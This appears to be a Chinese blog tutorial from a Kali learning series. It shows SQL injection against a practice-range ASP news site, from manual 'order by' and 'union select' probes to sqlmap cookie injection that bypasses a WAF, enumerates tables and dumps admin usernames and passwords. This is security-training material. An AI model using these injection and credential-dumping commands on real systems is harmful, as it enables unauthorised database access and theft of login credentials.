茴香豆安全 - KALI学习笔记

茴香豆安全 - Sql注入如何绕过WAF/IPS防火墙

2020-06-02  本文已影响0人  wycdavid

一、前言

二、相关工具准备

三、具体测试过程

1. 打开靶场网站,寻找注入点,先可以采用人工的方式初步做些简单的验证

http://59.63.200.79:8004/shownews.asp?id=171
  • 到底怎么找注入点,说实话这个除非有相应的工具做全局的检测,其余的方法就是靠经验,靠人工先简单验证
  • 一般是一些详情页的url,比如上面这个新闻详情,我们随便修改id的值,如果内容跟着变化就很有可能是注入点
  • 然后我们在url后面拼接一些sql语句,来观察界面的变化
http://59.63.200.79:8004/shownews.asp?id=171 order by 10
image.png
http://59.63.200.79:8004/shownews.asp?id=171 union select 1,2,3,4,5,6,7,8,9,10 from admin

image.png
sqlmap -u "http://59.63.200.79:8004/shownews.asp?id=171"
image.png

2. 采用cookie注入的方式来绕过WAF

sqlmap -u "http://59.63.200.79:8004/shownews.asp" --cookie "id=171" --level 2

注意后面要加上 --level 2 ,等级2或者2以上,才可以进行cookie的注入

image.png

3. 猜解表

sqlmap -u "http://59.63.200.79:8004/shownews.asp" --tables --cookie "id=171" --level 2
image.png

如图所示,三个红框的内容分别解释下

  1. 系统提示因为是ACCESS数据库,是没法直接获得表的数量和表的名字的
  2. 系统问是否要用一个共通表来进行表是否存在的检测,你可以理解为是一个类似字典的文件,里面存了各种的表名,可以用于表名的暴力拆解,选择默认的1就好
  3. 系统问要启用多少个线程,线程越多速度越快,我们输入10就行
image.png

4. 继续猜解字段

sqlmap -u "http://59.63.200.79:8004/shownews.asp" --columns -T admin --cookie "id=171" --level 2
image.png

5. 获取用户名和密码

sqlmap -u "http://59.63.200.79:8004/shownews.asp" --dump -C username,password  -T admin --cookie "id=171" --level 2
image.png

五、最后

上一篇下一篇

猜你喜欢

热点阅读